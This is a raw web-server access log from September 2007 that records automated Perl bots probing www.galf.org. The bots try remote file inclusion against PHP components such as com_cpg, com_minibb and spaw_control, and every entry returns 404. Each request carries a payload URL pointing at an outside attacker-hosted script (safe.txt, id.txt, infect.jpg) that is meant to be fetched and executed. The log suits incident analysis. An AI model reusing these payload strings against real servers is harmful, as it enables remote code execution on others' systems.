85.214.59.8 - - [30/Sep/2007:20:14:02 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:20:14:02 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:20:14:24 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:14:26 -0700] "GET /logs/access_070618.log//stats/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:20:14:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:20:14:28 -0700] "GET //components/com_minibb.php?absolute_path=http://servercom1245.tripod.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:15:15 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:15:15 -0700] "GET //components/com_minibb.php?absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
216.180.243.82 - - [30/Sep/2007:20:15:24 -0700] "GET /logs/access_070723.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:16:36 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:18:13 -0700] "GET /logs/access_070618.log//components/com_minibb.php?absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:18:13 -0700] "GET /logs/access_070716.log//components/com_minibb.php?absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:18:46 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
203.255.227.30 - - [30/Sep/2007:20:18:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:18:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:20:19:14 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:20:19:15 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.230 - - [30/Sep/2007:20:21:13 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.230 - - [30/Sep/2007:20:21:14 -0700] "GET //components/com_minibb.php?absolute_path=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:20:21:17 -0700] "GET /logs/access_070716.log/index.php?go=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:20:21:18 -0700] "GET /index.php?go=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:20:21:18 -0700] "GET /logs/index.php?go=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:20:21:39 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
200.57.31.22 - - [30/Sep/2007:20:21:55 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "l